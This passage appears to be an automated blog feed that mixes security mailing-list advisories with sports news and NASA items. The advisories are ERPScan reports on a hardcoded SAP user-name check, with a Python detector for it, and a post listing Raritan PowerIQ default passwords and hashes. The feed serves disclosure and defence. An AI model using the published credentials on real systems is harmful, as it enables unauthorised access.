* switch to adjust mode
WHEN 'XADJ'.
  CLEAR GV_OK_CODE.
  CALL FUNCTION 'TOCX_GET_SYSTEM_TYPE' IMPORTING SAP_SYSTEM = GS_DYN300-SAP_SYSTEM EXCEPTIONS OTHERS = 1.

  IF GS_DYN300-SAP_SYSTEM = 'X' OR SY-UNAME = 'DDIC'.
    IF GS_DYN300-ADJUST = ' '.

      SELECT * FROM DD02L WHERE TABNAME = GS_DYN300-VIEW AND AS4LOCAL = 'A'.

8. REPORT TIMELINE
Sent: 06.03.2014
Reported: 07.03.2014
Vendor response: 07.03.2014
Date of Public Advisory: 15.06.2015

9. REFERENCES
http://ift.tt/1O4ufQN

10. ABOUT ERPScan Research
The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.

ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.

We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan
ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.

ERPScan's primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.

We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

USA Address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

errors" for anonymous users

Seems like this problem keeps coming up in D6 when the cache is enabled... specifically for /user/register and /node/add. Clearing the cache fixes it, ...

from Google Alert - anonymous http://ift.tt/1FAjayW
via IFTTT

[FD] [ERPSCAN-15-015] SAP NetWeaver AS ABAP– Hardcoded Credentials

ERPSCAN Research Advisory [ERPSCAN-15-015] SAP NetWeaver AS ABAP – Hardcoded Credentials

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver AS ABAP, probably others
Vendor URL: http://SAP.com
Bugs: Hardcoded credentials
Sent: 06.03.2014
Reported: 07.03.2014
Vendor response: 07.03.2014
Date of Public Advisory: 15.06.2015
Reference: SAP Security Note 2057982
Author: Rustem Gazizov, Diana Grigorieva (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP NetWeaver AS ABAP – Hardcoded Credentials
Advisory ID: [ERPSCAN-15-015]
Risk: High
Advisory URL: http://ift.tt/1JiX1Zx
Date published: 15.06.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: hardcoded credentials [CWE-798]
Impact: read application data; gain privileges / assume identity
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information
CVSS Base Score: 2.1 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) High (H)
Au : Authentication (Level of authentication needed to exploit) Single (S)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity None (N)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION
The program code contains a hardcoded username that changes the system's behavior if the user is authenticated successfully. The user may obtain additional information that should not be displayed.

4. VULNERABLE PACKAGES
SAP NetWeaver AS ABAP
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2057982.

6. AUTHOR
Rustem Gazizov, Diana Grigorieva (ERPScan)

7. TECHNICAL DESCRIPTION
An attacker can use hardcoded credentials to get unauthorized access and perform various actions in the system. In addition, code of this kind is likely to function as a backdoor into the system. The vulnerability is in the FKCDBFTRACE ABAP program. The relevant fragment (the end of one macro definition and the SWITCH_TRACE_ON macro, which emits a comparison of SY-UNAME against a fixed user name into generated code):

        APPEND &1.
      ENDIF.
    END-OF-DEFINITION.

    DEFINE SWITCH_TRACE_ON.
      MOVE 'IF SY-UNAME = ''SCHWABK''.' TO MKCD_LINE.
      APPEND MKCD_LINE TO &1.
    END-OF-DEFINITION.

8. REPORT TIMELINE
Sent: 06.03.2014
Reported: 07.03.2014
Vendor response: 07.03.2014
Date of Public Advisory: 15.06.2015

9. REFERENCES
http://ift.tt/1JiX1Zx

10. ABOUT ERPScan Research
The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.
ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.
ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.
ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.
We have highly qualified experts on staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan
ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging Vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.
ERPScan's primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.
Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi-award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user-friendly dashboards, manages risks and tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.
We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and a partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

USA Address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
http://erpscan.com
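As an added example (not part of the advisory and not ERPScan's or SAP's tooling), a small Python static check for the defect class this advisory describes: comparisons of SY-UNAME against a string literal in ABAP source, including the doubled-quote form hidden inside a string that a macro later emits as generated code, which a plain grep for SY-UNAME = 'X' would miss. The ABAP sample is constructed to mirror the advisory's snippet; the user name DEVUSER, the variable names and the comment line are constructed.

```python
import re
from typing import List, Tuple

# Constructed ABAP sample (not real SAP source) mirroring the advisory's
# snippet: a macro that emits a SY-UNAME check into generated code, a direct
# literal comparison, a comparison against a variable, and a comment line.
SAMPLE_ABAP = """\
DEFINE SWITCH_TRACE_ON.
  MOVE 'IF SY-UNAME = ''SCHWABK''.' TO MKCD_LINE.
  APPEND MKCD_LINE TO &1.
END-OF-DEFINITION.

IF sy-uname = 'DEVUSER'.
  lv_debug = abap_true.
ENDIF.

IF sy-uname = lv_expected_user.
ENDIF.
* IF SY-UNAME = 'OLDUSER'.   commented-out line, ignored by the check
"""

# ABAP keywords and system fields are case-insensitive. Inside an ABAP string
# literal a single quote is written as two quotes (''), so a comparison that
# is built as a string and appended to a code table (as in the advisory)
# appears as SY-UNAME = ''NAME'' rather than SY-UNAME = 'NAME'.
_OPS = r"(?:=|EQ|<>|NE)"
DIRECT_RE = re.compile(r"\bSY-UNAME\s*" + _OPS + r"\s*'([^']+)'", re.IGNORECASE)
EMBEDDED_RE = re.compile(r"\bSY-UNAME\s*" + _OPS + r"\s*''([^']+)''", re.IGNORECASE)


def find_hardcoded_unames(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, kind, username) for each SY-UNAME comparison against
    a literal. kind is 'direct' for ordinary code and 'generated' for a
    literal embedded in a string that will later be emitted as code.
    Full-line '*' comments are skipped; inline '"' comments are not stripped,
    so a hit in one should be reviewed rather than dismissed automatically."""
    findings: List[Tuple[int, str, str]] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if line.startswith("*"):          # full-line ABAP comment
            continue
        m = EMBEDDED_RE.search(line)      # doubled quotes: generated code
        if m:
            findings.append((line_no, "generated", m.group(1)))
            continue
        m = DIRECT_RE.search(line)        # ordinary literal comparison
        if m:
            findings.append((line_no, "direct", m.group(1)))
    return findings


def report(source: str) -> List[str]:
    """Human-readable finding lines; generated-code hits are flagged
    separately because they are the ones a naive search overlooks."""
    out = []
    for line_no, kind, user in find_hardcoded_unames(source):
        note = "hidden in generated code" if kind == "generated" else "direct comparison"
        out.append(f"line {line_no}: SY-UNAME compared to literal {user!r} ({note})")
    return out


if __name__ == "__main__":
    for entry in report(SAMPLE_ABAP):
        print(entry)
```

Run over the constructed sample it reports the SCHWABK literal on line 2 as hidden in generated code and DEVUSER on line 6 as a direct comparison, while the variable comparison and the commented line produce nothing.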

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-014] SAP Mobile Platform 3 – XXE in Add Repository

[FD] OpenLDAP ber_get_next Denial of Service

OpenLDAP ber_get_next Denial of Service
Affected Versions: OpenLDAP <= 2.4.42
PDF: http://ift.tt/1EZRMzx


[FD] Silver Peak VXOA Multiple Vulnerabilities

Silver Peak VXOA Multiple Vulnerabilities
Affected versions: Silver Peak VX < 6.2.11
PDF: http://ift.tt/1M0saSN


[FD] Raritan PowerIQ default credentials

Hello list,

Raritan PowerIQ ships with a few default accounts and passwords/hashes. For the web interface, there are technically 3 default users.

web_api:sl33p30F00dumass!
epiq_api:raritan
admin:raritan

You can technically authenticate with the epiq_api user on the web interface and the PowerIQ API, but can't do anything (as far as I can tell). The web_api user seems disabled by default.

The password hashes are salted and shasum'd with salts stored next to the passwords in the database.

shasum("--salt--pass--")

Some password hashes on the file system.

$1$MKq.819X$xEoWD6Lu4vcGFmZvF8H.M. -- drag0n -- seems like a development/temp password
$1$A0O1SyDL$NhsID.NJdZkkbh1SS4tXz/
$1$JoxiePCF$UxrFdjuBa351WSwC9coP7/
$1$lkaK891$wnnnDvFd3qpJ8H/MHZs.T1 -- drag0n -- seems like a development/temp password

I have been unable to crack the two middle passwords, but these were taken from the setup configuration file and seem hardcoded.


Blocking Authentication Attempts from Anonymous Networks

The Dark Web is a smaller subset that hides the IP addresses of the servers that run them, by using Tor or other anonymous networks. This Wired ...

from Google Alert - anonymous http://ift.tt/1iAymqX
via IFTTT

11 Million Ashley Madison Passwords Cracked In Just 10 Days

Last month, when hackers leaked nearly 100 gigabytes of sensitive data belonging to the popular online casual sex and marriage affair website 'Ashley Madison', there was at least one thing in favor of the 37 million cheaters: their passwords were encrypted. But the never-ending saga of the Ashley Madison hack could now definitely hit the cheaters hard, because a group of crazy Password


from The Hacker News http://ift.tt/1NkqtBc
via IFTTT

Combining data- and theory-driving insights using large, anonymous datasets of expressive online ...

Combining data- and theory-driving insights using large, anonymous datasets of expressive online behavior. Cambridge Big Data · Events · Events in ...

from Google Alert - anonymous http://ift.tt/1Qr78hW
via IFTTT

After FIFA scandals, proposals by FIFA reform adviser Scala

GENEVA (AP) Many have urged FIFA to change its ways. Few have succeeded.

from FOX Sports Digital http://ift.tt/1gce990
via IFTTT

Anonymous Report Form

If you want to report an assault, print out this Anonymous Report Form (PDF) for yourself or on behalf of someone you are helping, and bring it to ...

from Google Alert - anonymous http://ift.tt/1MehFy9
via IFTTT

I have a new follower on Twitter


aviation
home of aviation
sky

Following: 293 - Followers: 281

September 10, 2015 at 11:19AM via Twitter http://twitter.com/aviation_1

I have a new follower on Twitter


Ruth Brons
American String Teachers Association Kudos Award Recipient 2014 #BowHoldBuddies
Finally, an Instant Bow Hold!™
http://t.co/2FycMcaPYx
Following: 1029 - Followers: 5721

September 10, 2015 at 10:18AM via Twitter http://twitter.com/BowHoldBuddies

ISS Daily Summary Report – 09/9/15

Human Research Program (HRP) Operations:

Microbiome: Kelly collected saliva samples in support of the Flight Day 180 (FD 180) Microbiome activities. The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual's microbiome (the collection of microbes that live in and on the human body at any given time).

Salivary Markers: Yui collected saliva samples in support of his FD 90 Salivary Markers and inserted them into MELFI. Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays. This research study will help identify whether there are any risks of an adverse health event in crewmembers due to an impaired immune system. Maintaining a robust immune system during prolonged spaceflight missions (i.e., to other planets or asteroids) will be important to ensure mission success. If any impairment in immunity is found due to spaceflight, this will allow the development of appropriate countermeasures to help mitigate the risks.

Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max: Yui performed his FD45 Sprint VO2 Max exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS). He donned Electrocardiogram (ECG) electrodes and Heart Rate Monitor (HRM) hardware, performed Portable Pulmonary Function System (PPFS) calibrations, then executed the VO2 protocol. The Sprint investigation evaluates the use of high-intensity, low-volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of investigators' long-term goal of protecting human fitness for even longer space exploration missions.

JAXA Small Satellite Orbital Deployer (SSOD) #4 Install: Kelly installed the J-SSOD #4 on the Slide Table with the Multi-Purpose Experiment Platform (MPEP) attached. The J-SSOD #4 has two satellites that will be deployed next week. The first satellite is designed to observe the Ultraviolet (UV) spectrum during the Orionid meteor shower in October. The second satellite, sponsored by the University of Brasilia and the Brazilian government, focuses on meteorological data collection.

Robonaut: Lindgren continued troubleshooting Robonaut's Compact Peripheral Component Interface (CPCI). He unstowed and removed the softgoods from Robonaut, then accessed the internal workings to measure resistances and the CPCI power supply. Preliminary results point to an issue with the power supply, and not the "brain stem". Future troubleshooting will likely include reseating the power supply to rule out a connection issue. Robonaut is a two-armed humanoid robot torso designed with the versatility and dexterity to manipulate hardware, work in high-risk environments, and respond safely to unexpected obstacles. Robonaut is currently mounted inside the International Space Station (ISS); in the future, it will perform tasks both inside and outside the ISS.

Mobile Servicing System (MSS) Operations: Last night, the Robotics Ground Controllers powered up the MSS and translated the Mobile Transporter (MT) from Worksite 7 (WS7) to WS5. They then walked the Space Station Remote Manipulator System (SSRMS) off Mobile Base System (MBS) Power Data Grapple Fixture 4 (PDGF4) onto the Node 2 PDGF. During the walkoff, the Robotics Ground Controllers performed Gear Box Limping (GBL) Commissioning Task 3 for Latching End Effector A (LEE-A). Finally, the Robotics Ground Controllers maneuvered the SSRMS to the H-II Transfer Vehicle 5 (HTV5) External Platform (EP) handoff position in preparation for next Tuesday's EP installation into HTV5.

HTV Cargo Transfer Status: Yui completed 1.5 hours of HTV cargo operations yesterday. Cargo specialists estimate the crew will need approximately 20 hours to complete the HTV-5 cargo operations.

ESA Short Duration Mission

THOR: Cloud Turret (CT) and Transient Luminous Event (TLE) targets have been refined for the upcoming hard-scheduled session today. Yesterday we focused on Cloud Turret observation. The first hard-scheduled session went well, and during the GMT251 ESA crew conference, Mogensen confirmed he acquired some CT targets. 160 images are now under assessment by the science team. The THOR experiment will improve our understanding of how lightning activity powers cloud turrets and gravity waves, and improve our understanding of the structure of Transient Luminous Events above thunderstorms. If confirmed technically feasible, the photography technique used will also add valuable scientific data to ESA's future ASIM project mission. Improving our understanding of the processes occurring in Earth's lower layers of the atmosphere can improve atmospheric models and our understanding of Earth's climate and weather.

MARES: This morning Mogensen set up the rack and its ankle mechanism assembly. A small anomaly was encountered regarding a screw that was no longer touching the thread. This was resolved in real time. The ESA Muscle Atrophy Research and Exercise System (MARES) is a physiological research facility that will be used to carry out research on musculoskeletal, biomechanical, and neuromuscular human physiology. Commissioning Part #2 is the last step in this research rack's check-out activities. Its main goal is the performance of an integrated man-in-the-loop technical protocol which characterizes all MARES sub-systems and associated auxiliary measurement devices (ultrasound, electrical muscle stimulation and electromyogram).

MELONDAU: Yesterday DEMES tasting session #4 and DEMES hedonic questionnaire #2 were completed nominally.

Current status of MCA/AQM measurements:
- MCA measurements have been received by BIOTESC for GMT248 to GMT250; GMT251 files are pending.
- AQM: confirmed that we have no measurements for either GMT248 or GMT249. For GMT250, some files were acquired with AQM in speed mode (rather than autorun mode). For GMT251, the same speed mode was used. All files are still pending from NASA.

Long-distance and long-term human space travel will only be possible with adequate life support systems in place, allowing extensive recycling of water and the in situ production of oxygen and food, with closed regenerative systems the most ideal way of reducing launch mass and costs. […]

from ISS On-Orbit Status Report http://ift.tt/1OflZNd
via IFTTT

FIFA adviser urges presidential term limits to force change

ZURICH (AP) FIFA adviser Domenico Scala says imposing term limits on presidents and top officials is needed to change soccer's governing body.

from FOX Sports Digital http://ift.tt/1OCyDnw
via IFTTT

Russian Hackers Hijack Satellite To Steal Data from Thousands of Hacked Computers

A group of Russian hackers, most notably the Turla APT (Advanced Persistent Threat) is hijacking commercial satellites to hide command-and-control operations, a security firm said today. Turla APT group, which was named after its notorious software Epic Turla, is abusing satellite-based Internet connections in order to: Siphon sensitive data from government, military, diplomatic, research


from The Hacker News http://ift.tt/1OfhyC4
via IFTTT

Bayern midfielder Javi Martinez eyeing return from injury

MUNICH (AP) Bayern Munich defensive midfielder Javi Martinez hopes to return soon from a serious left knee injury.

from FOX Sports Digital http://ift.tt/1gbtFSJ
via IFTTT

Balotelli set for 2nd Milan debut in derby at old club Inter

MILAN (AP) Mario Balotelli is expected to make his second AC Milan debut on Sunday, adding extra spice to what is already set to be a heated derby match against Inter Milan.

from FOX Sports Digital http://ift.tt/1FzhyFN
via IFTTT

Dortmund, Bayern aim to maintain perfect league starts

BERLIN (AP) The Bundesliga returns from the international break with Borussia Dortmund and Bayern Munich aiming to maintain their perfect starts to the season. Dortmund, which leads on goal difference after three games, visits Hannover on Saturday, while Bayern hosts Augsburg for a Bavarian derby.

from FOX Sports Digital http://ift.tt/1i0d4T2
via IFTTT

Aquarius Sea Surface Salinity 2011-2015

Aquarius is a collaboration between NASA and the Space Agency of Argentina to measure global sea surface salinity (the amount of dissolved salts in water). Measuring salinity can help us better understand the water cycle and can also lead to improved climate models. The visualizations show the complete observations of sea surface salinity taken during the life span (2011 through May 2015) of the Aquarius spacecraft. In these visualizations, sea surface salinity is shown ranging from 30 to 40 PSU (from blue to green to red) on a flat map using simple Cartesian and extended Mollweide projections. The visualizations were generated based on version 4.0 of the Aquarius data products.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1UDz3AV
via IFTTT

2017 Total Solar Eclipse in the U.S.

On Monday, August 21, 2017, the Moon will pass in front of the Sun, casting its shadow across all of North America. This will be the first total solar eclipse visible in the contiguous United States in 38 years.

The Moon's shadow can be divided into areas called the umbra and the penumbra. Within the penumbra, the Sun is only partially blocked, and observers experience a partial eclipse. The much smaller umbra lies at the very center of the shadow cone, and anyone there sees the Moon entirely cover the Sun in a total solar eclipse.

In the animation, the umbra is the small black oval. The red streak behind this oval is the path of totality. Anyone within this path will see a total eclipse when the umbra passes over them. The much larger shaded bullseye pattern represents the penumbra. Steps in the shading denote different percentages of Sun coverage, at levels of 90%, 75%, 50% and 25%. The yellow and orange contours map the path of the penumbra. The outermost yellow contour is the edge of the penumbra path. Outside this limit, no part of the Sun is covered by the Moon.

The numbers in the lower left corner give the latitude and longitude of the center of the umbra as it moves eastward, along with the altitude of the Sun above the horizon at that point. Also shown is the duration of totality: for anyone standing at the center point, this is how long the total solar eclipse will last. Note that the duration varies from just 2 minutes on the West Coast to 2 minutes 40 seconds east of the Mississippi River.

About Accuracy

You might think that calculating the circumstances of an eclipse would be, if not easy, then at least precise. If you do the math correctly, you'd expect to get exactly the same answers as everyone else. But the universe is more subtle than that. The Earth is neither smooth nor perfectly spherical, nor does it rotate at a perfectly constant, predictable speed. The Moon isn't smooth, either, which means that the shadow it casts isn't a simple circle. And our knowledge of the size of the Sun is uncertain by a factor of about 0.2%, enough to affect the duration of totality by several seconds.

Everyone who performs these calculations will make certain choices to simplify the math or to precisely define an imperfectly known number. The choices often depend on the goals and the computing resources of the calculator, and as you'd expect, the results will differ slightly. You can get quite good results with a relatively simple approach, but it sometimes takes an enormous effort to get only slightly better answers.

The following table lists some of the constants and data used for this animation.

Earth radius        6378.137 km
Earth flattening    1 / 298.257 (the WGS 84 ellipsoid)
Moon radius         1737.4 km (k = 0.2723993)
Sun radius          696,000 km (959.634 arcsec at 1 AU)
Ephemeris           DE 421
Earth orientation   earth_070425_370426_predict.bpc (ΔT corrected)
Delta UTC           68.184 seconds (TT - TAI + 36 leap seconds)

A number of sources explain Bessel's method of solar eclipse calculation, including chapter 9 of Astronomy on the Personal Computer by Oliver Montenbruck and Thomas Pfleger and the eclipses chapter of The Explanatory Supplement to the Astronomical Almanac. The method was adapted to the routines available in NAIF's SPICE software library.

The value for the radius of the Moon is slightly larger than the one used by Fred Espenak and slightly smaller than the one used by the Astronomical Almanac. The Sun radius is the one used most often, but see figure 1 in M. Emilio et al., Measuring the Solar Radius from Space during the 2003 and 2006 Mercury Transits for a sense of the uncertainty in this number.

Both the elevations of locations on the Earth and the irregular limb of the Moon were ignored. The resulting small errors mostly affect the totality duration calculation, but they tend to cancel out: elevations above sea level slightly lengthen totality, while valleys along the lunar limb slightly shorten it.
The effect on the rendered images is negligible (smaller than a pixel). Another minor complication that's ignored here is the difference between the Moon's center of mass (the position reported in the ephemeris) and its center of figure (the center of the disk as seen from Earth). These two centers don't exactly coincide because the Moon's mass isn't distributed evenly, but the difference is quite small, about 0.5 kilometers.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1OC6Aob
via IFTTT

2017 Eclipse Shadow Cones

A solar eclipse occurs when the Moon's shadow falls on the Earth. The shadow comprises two concentric cones called the umbra and the penumbra. Within the smaller, central umbra, the Sun is completely blocked by the Moon, and anyone inside the umbra sees a total eclipse. Within the larger penumbra, the Sun is only partially blocked. In this animation, the umbra and penumbra cones are viewed through a telescopic lens on a virtual camera located far behind the Moon. Long focal lengths like the one used here appear to compress the distance between near and far objects. Despite appearances, the geometry of the scene is correct. The Earth is roughly 112 lunar diameters beyond the Moon, and the angle at the apex of the umbral cone is only about half a degree. From this point of view directly behind the Moon, the edges of the shadow cones look circular. The edge of the penumbra is outlined in yellow. It passes over all of North and Central America and the Amazon basin, as well as Greenland and the North Pole. Everyone there will see at least a partial eclipse. The path of the umbra (the small black dot) crosses the United States from Oregon to South Carolina.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1UDz4ox
via IFTTT

2017 Eclipse and the Moon's Orbit

Solar eclipses can only occur at New Moon, when the Moon is between the Earth and the Sun. But not every New Moon produces an eclipse. The Moon's orbit is slightly tilted, and as seen in this animation, the tilt causes the Moon's shadow to miss the Earth during most New Moons—about five out of six, in fact. As the Earth-Moon system orbits the Sun throughout the year, the Moon's orbital tilt changes direction relative to the Sun. Sometimes the up side of the orbit is facing the Sun, and sometimes the down side. Twice a year, for about a month, what's facing the Sun is the line dividing the up and down sides. This is the line of nodes, the intersection of the Earth-Moon plane and the ecliptic or Earth-Sun plane. A solar eclipse can only occur at a New Moon that falls within one of these month-long eclipse seasons. That's when the Moon is close enough to the ecliptic to actually come between the Earth and the Sun. In this animation, the olive-colored square represents the ecliptic plane, while the light blue circle shows the plane of the Moon's orbit. The darker half of the lunar orbit plane is below (south of) the ecliptic, and the dividing line between light and dark is the line of nodes. The radial grid on the lunar orbit plane is stationary relative to the stars. It appears to rotate because our point of view is fixed to the Earth-Sun line; we're following the Earth as it orbits the Sun. At first glance, the line of nodes appears to be tracking with the grid, but in reality it's slowly turning westward (clockwise), completing a full revolution in 18.6 years. Unlike most illustrations of this kind, the Earth and the Moon are to scale. The Sun is off-screen to the left, about 400 times farther than the Earth-Moon distance and roughly twice as big as the Moon's orbit.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1OC6A7C
via IFTTT

Barcelona and Atletico to see how they measure up in Spain

MADRID (AP) Barcelona and Atletico Madrid get to test their strength in the first big match of the season in the Spanish league.

from FOX Sports Digital http://ift.tt/1VPqfVW
via IFTTT

Villas-Boas to quit as Zenit coach at end of season

MOSCOW (AP) Andre Villas-Boas says he will quit as Zenit St. Petersburg coach at the end of the season after he was blocked from leaving in the summer.

from FOX Sports Digital http://ift.tt/1ifnPBD
via IFTTT

Study: 800,000 tourists attended football games in England

LONDON (AP) The lure of British football is highlighted in a study which found that 800,000 international visitors to the country last year attended a match, spending more than $1 billion during their time there.

from FOX Sports Digital http://ift.tt/1UDgjBG
via IFTTT

NGC 1316: After Galaxies Collide


Astronomers turn detectives when trying to figure out the cause of startling sights like NGC 1316. Their investigation indicates that NGC 1316 is an enormous elliptical galaxy that started, about 100 million years ago, to devour a smaller spiral galaxy neighbor, NGC 1317, just above it. Supporting evidence includes the dark dust lanes characteristic of a spiral galaxy, and faint swirls and shells of stars and gas visible in this wide and deep image. One thing that remains unexplained is the unusually small globular star clusters, seen as faint dots on the image. Most elliptical galaxies have more and brighter globular clusters than NGC 1316. Yet the observed globulars are too old to have been created by the recent spiral collision. One hypothesis is that these globulars survive from an even earlier galaxy that was subsumed into NGC 1316. Another surprising attribute of NGC 1316, also known as Fornax A, is its giant lobes of gas that glow brightly in radio waves. via NASA http://ift.tt/1OxDOVv

Wednesday, September 9, 2015

Orioles Highlight: Steve Pearce hits go-ahead HR, Ubaldo Jimenez (7 IP, 3 ER) gets 11th win in 5-3 victory at Yankees (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

A Topological Approach to Meta-heuristics: Analytical Results on the BFS vs. DFS Algorithm Selection Problem. (arXiv:1509.02709v1 [cs.AI])

Search is a central problem in artificial intelligence, and BFS and DFS the two most fundamental ways to search. In this report we derive results for average BFS and DFS runtime: For tree search, we employ a probabilistic model of goal distribution; for graph search, the analysis depends on an additional statistic of path redundancy and average branching factor. As an application, we use the results on two concrete grammar problems. The runtime estimates can be used to select the faster out of BFS and DFS for a given problem, and may form the basis for further analysis of more advanced search methods. Finally, we verify our results experimentally; the analytical approximations come surprisingly close to empirical reality.



from cs.AI updates on arXiv.org http://ift.tt/1Q2axD2
via IFTTT

Ravens: WR Steve Smith is appealing the fine he received stemming from his ejection in preseason game vs. Redskins (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Multiple Cross-Site Scripting vulnerabilities in Synology Download Station



[FD] Synology Video Station command injection and multiple SQL injection vulnerabilities



Mexico TV uses Trump to heat soccer rivalry

MEXICO CITY (AP) One of Mexico's leading television networks is using the words of Republican presidential aspirant Donald Trump to bump up the already heated rivalry between the U.S. and Mexico men's national soccer teams.

from FOX Sports Digital http://ift.tt/1XLXQll
via IFTTT

Crowded contest for FIFA top job as Prince Ali makes 2nd bid

GENEVA (AP) FIFA presidential contender Prince Ali bin al-Hussein has launched his second bid for football's top office into a more crowded field.

from FOX Sports Digital http://ift.tt/1ix9XCy
via IFTTT

German football chief visits 'Refugees United'

BERLIN (AP) The help being given to migrants by German soccer clubs was praised by German football federation (DFB) president Wolfgang Niersbach on Wednesday as he visited migrants in the central state of Hesse.

from FOX Sports Digital http://ift.tt/1OzekHi
via IFTTT

Orioles: Rumblings of internal strife amid streak of 3 straight winning seasons being snapped, writes Jerry Crasnick (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Samsung Launches 6GB RAM Chips for Next Generation Smartphones

With the launch of the Galaxy S6 and Galaxy S6 Edge, Samsung was the first to bring 4GB of RAM to Android mobile phones, with the Samsung Note 5 and the current OnePlus 2 carrying the same RAM capacity. Now Samsung has again taken the technology a step further with the launch of a 12GB LPDDR4 (low power, double data rate 4) DRAM chip that will offer 6GB RAM for the


from The Hacker News http://ift.tt/1L1I68K
via IFTTT

